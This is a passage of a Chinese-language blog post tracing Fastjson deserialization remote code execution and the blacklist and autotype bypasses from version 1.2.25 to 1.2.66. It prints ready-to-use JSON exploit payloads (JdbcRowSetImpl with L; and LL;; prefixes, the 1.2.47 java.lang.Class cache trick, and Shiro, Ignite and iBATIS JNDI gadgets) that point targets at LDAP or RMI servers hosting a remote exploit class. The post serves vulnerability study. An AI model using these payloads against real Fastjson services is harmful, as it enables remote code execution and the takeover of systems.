<p>getOutputProperties()方法其对应的属性应该为<code>public</code>的<code>outputProperties</code>，其实你删了<code>_</code>也可以，<code>_</code>并不是必须的，那么fastjson到底是怎么处理的呢？<br />
<img src="/wp-content/uploads/2020/04/20200426114018.png" alt="image.png" /></p>
<p>在<code>com.alibaba.fastjson.parser.deserializer.JavaBeanDeserializer#parseField</code>中解析每一个字段时，会进行一次灵活匹配<code>this.smartMatch()</code><br />
<img src="/wp-content/uploads/2020/04/20200426119256.png" alt="image.png" /><br />
在进行is关键字判断之后，替换掉<code>-</code>和<code>_</code>再匹配getter和setter<br />
<img src="/wp-content/uploads/2020/04/20200426111692.png" alt="image.png" /><br />
所以就会调用<code>getOutputProperties()</code><br />
<img src="/wp-content/uploads/2020/04/20200426116858.png" alt="image.png" /><br />
而其返回值又是Properties，所以可以完美调用<code>getOutputProperties()</code>，进而触发<code>newTransformer()</code>-><code>getTransletInstance()</code>-><code>newInstance()</code>，导致RCE。</p>
<p><strong>问题3：<code>_bytecodes</code>为什么需要base64编码</strong></p>
<p>在解析byte[]的时候进行了base64解码<br />
<img src="/wp-content/uploads/2020/04/20200426117322.png" alt="image.png" /></p>
<p>跟进<br />
<img src="/wp-content/uploads/2020/04/20200426115663.png" alt="image.png" /></p>
<p><strong>问题4：_tfactory为什么为{}</strong><br />
在<code>fastjson-1.2.23.jar!/com/alibaba/fastjson/parser/deserializer/JavaBeanDeserializer.class:579</code>解析字段值时，会自动判断传入键值是否为空，如果为空会根据类属性定义的类型自动创建实例<br />
<img src="/wp-content/uploads/2020/04/20200426117245.png" alt="image.png" /></p>
<p>到这算是把fastjson写的差不多，剩下的就是无尽的bypass。</p>
<h3>1.2.25-1.2.41</h3>
<p>在1.2.25版本中，重新使用jdbc利用链复现报错<br />
<img src="/wp-content/uploads/2020/04/20200426118908.png" alt="image.png" /></p>
<p>使用idea对比两个jar包发现改为了checkAutoType()方法<br />
<img src="/wp-content/uploads/2020/04/20200426110544.png" alt="image.png" /></p>
<p>跟进checkAutoType()发现<br />
<img src="/wp-content/uploads/2020/04/20200426116206.png" alt="image.png" /></p>
<p>增加了类前缀黑名单白名单判断，在1.2.25版本中AutoTypeSupport默认false，需要显示关闭白名单</p>
<pre><code class="language-java ">ParserConfig.getGlobalInstance().setAutoTypeSupport(true);
</code></pre>
<p>在关闭了AutoTypeSupport之后仍然需要绕过黑名单，以startsWith判断<br />
<img src="/wp-content/uploads/2020/04/20200426117781.png" alt="image.png" /><br />
但是在跟了TypeUtils.loadClass()之后会发现<br />
<img src="/wp-content/uploads/2020/04/20200426110879.png" alt="image.png" /><br />
如果classname以<code>[</code>开头loadClass会自动去掉，还有就是开头<code>L</code>结尾<code>;</code>的也会去掉，那么我们有了新的绕过方法：</p>
<pre><code class="language-java ">ParserConfig.getGlobalInstance().setAutoTypeSupport(true); // 必须显示关闭白名单
{"@type":"Lcom.sun.rowset.JdbcRowSetImpl;","dataSourceName":"ldap://localhost:1389/#Calc", "autoCommit":true}
</code></pre>
<p>7u21的链同理，在1.2.25之后所谓的绕过都是在显示关闭白名单的条件下绕过的。</p>
<h3>1.2.42绕过</h3>
<p>在1.2.41中<code>L;</code>的方法测试可以，1.2.42中不行<br />
<img src="/wp-content/uploads/2020/04/20200426118932.png" alt="image.png" /></p>
<p>对比jar发现ParserConfig中黑名单改为hash<br />
<img src="/wp-content/uploads/2020/04/20200426114517.png" alt="image.png" /><br />
classname截取<code>L;</code><br />
<img src="/wp-content/uploads/2020/04/20200426115617.png" alt="image.png" /></p>
<p>通过计算hash让我们不知道黑名单是什么类，但是加密方式在<code>com.alibaba.fastjson.util.TypeUtils#fnv1a_64</code>是有的<br />
<img src="/wp-content/uploads/2020/04/20200426116258.png" alt="image.png" /><br />
通过变量常用的jar、类、字符串碰撞hash得到黑名单，有一个项目已经做好了：https://github.com/LeadroyaL/fastjson-blacklist</p>
<p>绕过也比较简单，<code>com.alibaba.fastjson.parser.ParserConfig#checkAutoType</code>截取一次，<code>com.alibaba.fastjson.util.TypeUtils#loadClass</code>截取一次，那么双写就可以绕过</p>
<pre><code class="language-json ">{"@type":"LLcom.sun.rowset.JdbcRowSetImpl;;","dataSourceName":"ldap://localhost:1389/#Calc", "autoCommit":true}
</code></pre>
<h3>1.2.43</h3>
<p>判断了是否以<code>LL</code>开头，直接抛出异常<br />
<img src="/wp-content/uploads/2020/04/20200426118900.png" alt="image.png" /></p>
<p>但是<code>[</code>还可以</p>
<pre><code class="language-json ">{"@type":"[com.sun.rowset.JdbcRowSetImpl"[{"dataSourceName":"ldap://localhost:1389/Exploit", "autoCommit":true}
</code></pre>
<h3>1.2.44</h3>
<p>修复之前<code>[</code>的问题，虽然之前<code>[</code>是不能用的</p>
<h3>1.2.45</h3>
<p>增加了黑名单</p>
<pre><code class="language-java ">//需要有第三方组件ibatis-core 3:0
{"@type":"org.apache.ibatis.datasource.jndi.JndiDataSourceFactory","properties":{"data_source":"rmi://localhost:1099/Exploit"}}
</code></pre>
<h3>1.2.47 通杀</h3>
<p>通杀autotype和黑名单</p>
<pre><code class="language-json ">{
    "a": {
        "@type": "java.lang.Class", 
        "val": "com.sun.rowset.JdbcRowSetImpl"
    }, 
    "b": {
        "@type": "com.sun.rowset.JdbcRowSetImpl", 
        "dataSourceName": "ldap://localhost:1389/Exploit", 
        "autoCommit": true
    }
}
</code></pre>
<p>在TypeUtils的static初始化时调用<code>com.alibaba.fastjson.util.TypeUtils#addBaseClassMappings</code>中会将常用的类通过loadclass()放入mapping中</p>
<pre><code class="language-java ">private static void addBaseClassMappings() {
    mappings.put("byte", Byte.TYPE);
    mappings.put("short", Short.TYPE);
    mappings.put("int", Integer.TYPE);
    mappings.put("long", Long.TYPE);
    mappings.put("float", Float.TYPE);
    mappings.put("double", Double.TYPE);
    mappings.put("boolean", Boolean.TYPE);
    mappings.put("char", Character.TYPE);
    mappings.put("[byte", byte[].class);
    mappings.put("[short", short[].class);
    mappings.put("[int", int[].class);
    mappings.put("[long", long[].class);
    mappings.put("[float", float[].class);
    mappings.put("[double", double[].class);
    mappings.put("[boolean", boolean[].class);
    mappings.put("[char", char[].class);
    mappings.put("[B", byte[].class);
    mappings.put("[S", short[].class);
    mappings.put("[I", int[].class);
    mappings.put("[J", long[].class);
    mappings.put("[F", float[].class);
    mappings.put("[D", double[].class);
    mappings.put("[C", char[].class);
    mappings.put("[Z", boolean[].class);
    Class&lt;?&gt;[] classes = new Class[]{Object.class, Cloneable.class, loadClass("java.lang.AutoCloseable"), Exception.class, RuntimeException.class, IllegalAccessError.class, IllegalAccessException.class, IllegalArgumentException.class, IllegalMonitorStateException.class, IllegalStateException.class, IllegalThreadStateException.class, IndexOutOfBoundsException.class, InstantiationError.class, InstantiationException.class, InternalError.class, InterruptedException.class, LinkageError.class, NegativeArraySizeException.class, NoClassDefFoundError.class, NoSuchFieldError.class, NoSuchFieldException.class, NoSuchMethodError.class, NoSuchMethodException.class, NullPointerException.class, NumberFormatException.class, OutOfMemoryError.class, SecurityException.class, StackOverflowError.class, StringIndexOutOfBoundsException.class, TypeNotPresentException.class, VerifyError.class, StackTraceElement.class, HashMap.class, Hashtable.class, TreeMap.class, IdentityHashMap.class, WeakHashMap.class, LinkedHashMap.class, HashSet.class, LinkedHashSet.class, TreeSet.class, TimeUnit.class, ConcurrentHashMap.class, loadClass("java.util.concurrent.ConcurrentSkipListMap"), loadClass("java.util.concurrent.ConcurrentSkipListSet"), AtomicInteger.class, AtomicLong.class, Collections.EMPTY_MAP.getClass(), BitSet.class, Calendar.class, Date.class, Locale.class, UUID.class, Time.class, java.sql.Date.class, Timestamp.class, SimpleDateFormat.class, JSONObject.class};
    Class[] var1 = classes;
    int var2 = classes.length;

    int var3;
    for(var3 = 0; var3 &lt; var2; ++var3) {
        Class clazz = var1[var3];
        if (clazz != null) {
            mappings.put(clazz.getName(), clazz);
        }
    }

    String[] awt = new String[]{"java.awt.Rectangle", "java.awt.Point", "java.awt.Font", "java.awt.Color"};
    String[] spring = awt;
    var3 = awt.length;

    int var11;
    for(var11 = 0; var11 &lt; var3; ++var11) {
        String className = spring[var11];
        Class&lt;?&gt; clazz = loadClass(className);
        if (clazz == null) {
            break;
        }

        mappings.put(clazz.getName(), clazz);
    }

    spring = new String[]{"org.springframework.util.LinkedMultiValueMap", "org.springframework.util.LinkedCaseInsensitiveMap", "org.springframework.remoting.support.RemoteInvocation", "org.springframework.remoting.support.RemoteInvocationResult", "org.springframework.security.web.savedrequest.DefaultSavedRequest", "org.springframework.security.web.savedrequest.SavedCookie", "org.springframework.security.web.csrf.DefaultCsrfToken", "org.springframework.security.web.authentication.WebAuthenticationDetails", "org.springframework.security.core.context.SecurityContextImpl", "org.springframework.security.authentication.UsernamePasswordAuthenticationToken", "org.springframework.security.core.authority.SimpleGrantedAuthority", "org.springframework.security.core.userdetails.User"};
    String[] var10 = spring;
    var11 = spring.length;

    for(int var12 = 0; var12 &lt; var11; ++var12) {
        String className = var10[var12];
        Class&lt;?&gt; clazz = loadClass(className);
        if (clazz == null) {
            break;
        }

        mappings.put(clazz.getName(), clazz);
    }

}
</code></pre>
<p>然后开始解析json，当传入type时进入checkAutoType()检查类<br />
<img src="/wp-content/uploads/2020/04/20200426116782.png" alt="image.png" /></p>
<p>在调用解析时我们没有传入预期的反序列化对象的对应类名时，会从mapping中或者deserializers.findClass()寻找<br />
<img src="/wp-content/uploads/2020/04/20200426114621.png" alt="image.png" /><br />
当找到类之后会直接return class，不会再进行autotype和黑名单校验，而在deserializers中有<code><span class="wpcom_tag_link"><a href="/tags/java" title="java" target="_blank">java</a></span>.lang.Class</code><br />
<img src="/wp-content/uploads/2020/04/20200426115596.png" alt="image.png" /></p>
<p>继续解析<br />
<img src="/wp-content/uploads/2020/04/20200426117492.png" alt="image.png" /></p>
<p>获取到java.lang.class对应的反序列化处理类<code>com.alibaba.fastjson.serializer.MiscCodec</code>，然后开始deserializer.deserialze()反序列化<br />
<img src="/wp-content/uploads/2020/04/20200426111709.png" alt="image.png" /><br />
parser.parse()获取val的值<br />
<img src="/wp-content/uploads/2020/04/20200426116949.png" alt="image.png" /><br />
赋值给strVal，然后经过一系列判断之后<br />
<img src="/wp-content/uploads/2020/04/20200426113708.png" alt="image.png" /><br />
传入TypeUtils.loadClass()</p>
<p>在loadclass中将strVal加入到mapping中<br />
<img src="/wp-content/uploads/2020/04/20200426118022.png" alt="image.png" /></p>
<p>此时mapping中有了jdbc的类名，而Mappings是ConcurrentMap类的，顾名思义就是在当前连接会话生效。所以我们需要在一次连接会话同时传入两个json键值对时，此次连接未断开时，继续解析第二个json键值对，然后和上文中提到的一样，在校验autotype和黑名单之前就已经return了clazz，变相绕过了黑名单，利用JNDI注入RCE。</p>
<h3>1.2.48</h3>
<p>黑名单多了两条，MiscCodec中将默认传入的cache变为false，checkAutoType()调整了逻辑</p>
<h3>1.2.62</h3>
<p>黑名单绕过</p>
<pre><code class="language-json ">{"@type":"org.apache.xbean.propertyeditor.JndiConverter","AsText":"rmi://127.0.0.1:1099/exploit"}";
</code></pre>
<h3>1.2.66</h3>
<p>也是黑名单绕过</p>
<pre><code class="language-java ">// 需要autotype true
{"@type":"org.apache.shiro.jndi.JndiObjectFactory","resourceName":"ldap://192.168.80.1:1389/Calc"}
{"@type":"br.com.anteros.dbcp.AnterosDBCPConfig","metricRegistry":"ldap://192.168.80.1:1389/Calc"}
{"@type":"org.apache.ignite.cache.jta.jndi.CacheJndiTmLookup","jndiNames":"ldap://192.168.80.1:1389/Calc"}
{"@type":"com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig","properties": {"@type":"java.util.Properties","UserTransaction":"ldap://192.168.80.1:1389/Calc"}}
</code></pre>
<h2>总结</h2>
<p>从<code>@type</code>属性牵扯出来一系列的RCE，整个过程分析下来还是很有收获，不停的bypass才是反序列化的最大乐趣。</p>
<h2>参考链接</h2>
<ol>
<li>https://www.anquanke.com/post/id/181874</li>
<li>https://xz.aliyun.com/t/7027</li>
<li><a class="wp-editor-md-post-content-link" href="https://www.kingkk.com/2019/07/Fastjson%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E-1-2-24-1-2-48/">Fastjson反序列化漏洞 1.2.24-1.2.48</a></li>
<li>https://mp.weixin.qq.com/s/i7-g89BJHIYTwaJbLuGZcQ</li>
</ol>
<p><strong>文笔垃圾，措辞轻浮，内容浅显，操作生疏。不足之处欢迎大师傅们指点和纠正，感激不尽。</strong></p>
]]></content:encoded>
					
		
		
			</item>
	</channel>
</rss>
